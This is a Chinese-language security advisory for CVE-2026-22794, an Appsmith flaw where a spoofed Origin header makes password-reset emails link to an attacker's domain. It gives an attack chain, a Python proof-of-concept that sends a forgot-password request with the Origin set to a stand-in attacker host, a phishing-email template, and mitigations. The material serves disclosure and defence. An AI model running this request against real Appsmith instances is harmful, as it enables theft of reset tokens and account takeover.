CVE-2026-22794 Appsmith Origin头验证缺失导致账户接管漏洞

漏洞信息

漏洞编号

CVE-2026-22794

漏洞类型

URL重定向/凭证泄露/身份验证绕过

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Appsmith

漏洞概述

CVE-2026-22794是Appsmith平台中的一个严重安全漏洞，该漏洞存在于1.93之前的版本中。Appsmith是一个开源平台，用于构建管理面板、内部工具和商业智能仪表板。漏洞的根本原因在于服务器端直接使用HTTP请求头中的Origin字段值作为电子邮件链接的baseUrl参数，而没有对该Origin值进行任何有效性验证或安全检查。攻击者可以通过构造恶意的Origin请求头，诱导服务器生成指向攻击者控制域名的密码重置链接或邮箱验证链接。当目标用户收到并点击这些伪造的链接时，其认证令牌（如密码重置token或邮箱验证token）将被发送到攻击者的服务器。由于认证令牌暴露，攻击者可以完全接管受害者的账户，包括修改密码、访问敏感数据和执行未授权操作。此漏洞的CVSS评分高达9.6，属于严重级别，对使用Appsmith的所有组织和个人构成重大安全威胁。

技术细节

该漏洞的技术原理涉及服务器对用户可控输入的安全处理不当。在Appsmith的邮件发送功能中，服务器使用请求头中的Origin值动态生成邮件中的链接。攻击者可以设置任意Origin值（如 attacker.com），服务器会直接使用该值构造邮件链接，例如：https://attacker.com/user/reset-password?token=xxx。攻击流程如下：1）攻击者向目标Appsmith实例发送注册或密码重置请求；2）在请求中设置恶意的Origin头（如Origin: https://attacker.com）；3）服务器使用该Origin值生成包含认证令牌的邮件链接；4）目标用户收到邮件并点击链接后，令牌被发送到攻击者服务器；5）攻击者获取令牌后即可重置用户密码或完成账户验证。整个过程无需目标用户进行额外操作，只需其点击邮件中的链接即可完成攻击。这种攻击方式结合了钓鱼和社会工程学技巧，利用了用户对邮件链接的信任心理。

攻击链分析

STEP 1

步骤1

攻击者向目标Appsmith服务器发送注册或密码重置请求，并在HTTP请求头中注入恶意的Origin字段，指向攻击者控制的域名

STEP 2

步骤2

服务器端代码接收请求后，使用请求头中的Origin值作为邮件链接的baseUrl，构造包含认证令牌的邮件内容

STEP 3

步骤3

服务器向受害者邮箱发送包含恶意链接的邮件，链接指向攻击者域名，例如：https://attacker.com/user/reset-password?token=XXX

STEP 4

步骤4

受害者收到邮件后，出于对Appsmith官方邮件的信任，点击邮件中的链接

STEP 5

步骤5

点击链接后，认证令牌被发送到攻击者控制的服务器，攻击者成功窃取密码重置token或邮箱验证token

STEP 6

步骤6

攻击者使用窃取的令牌完成密码重置或账户验证流程，从而完全接管受害者账户，获取对其Appsmith应用和数据的所有访问权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-22794 PoC - Origin Header Injection in Appsmith # This PoC demonstrates the Origin header injection vulnerability # that leads to account takeover via password reset token theft import requests import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart TARGET_URL = "https://vulnerable-appsmith-instance.com" ATTACKER_DOMAIN = "attacker-controlled-domain.com" ATTACKER_SERVER = f"https://{ATTACKER_DOMAIN}" def exploit_origin_injection(): """ Simulate the Origin header injection attack """ print("[*] Starting CVE-2026-22794 Exploitation") # Step 1: Request password reset with malicious Origin header reset_endpoint = f"{TARGET_URL}/api/v1/users/forgot-password" headers = { "Origin": ATTACKER_SERVER, # Malicious Origin "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } payload = { "email": "[email protected]" } print(f"[*] Sending password reset request with Origin: {ATTACKER_SERVER}") response = requests.post(reset_endpoint, json=payload, headers=headers) # Step 2: The server uses the attacker-controlled Origin to generate email links # Email will contain: https://attacker-controlled-domain.com/user/reset-password?token=XXX print(f"[*] Response Status: {response.status_code}") print(f"[*] Email sent to victim with malicious link") print(f"[*] Malicious URL: {ATTACKER_SERVER}/user/reset-password?token=<STOLEN_TOKEN>") # Step 3: Set up listener to capture the token print(f"[*] Attacker should set up listener on {ATTACKER_SERVER}") print(f"[*] When victim clicks the link, token will be exfiltrated") return True def generate_phishing_email(): """ Generate a phishing email template that the attacker would send """ email_template = f""" Subject: Password Reset Request Dear User, We received a request to reset your Appsmith account password. Click the link below to reset your password: {ATTACKER_SERVER}/user/reset-password?token={{token}} If you did not request this, please ignore this email. Best regards, Appsmith Team """ return email_template if __name__ == "__main__": exploit_origin_injection()

影响范围

Appsmith < 1.93

防御指南

临时缓解措施

在无法立即升级的情况下，可采取以下临时缓解措施：1）配置Web应用防火墙（WAF）规则，过滤异常的Origin请求头；2）限制邮件发送功能的访问频率，防止批量攻击；3）在反向代理层添加Origin头验证，拒绝来源不明的请求；4）启用Appsmith的双重认证功能，即使令牌泄露也能保护账户安全；5）通知用户通过官方应用程序界面而非邮件链接进行密码重置操作；6）监控邮件日志，及时发现邮件被发送至异常域名的情况。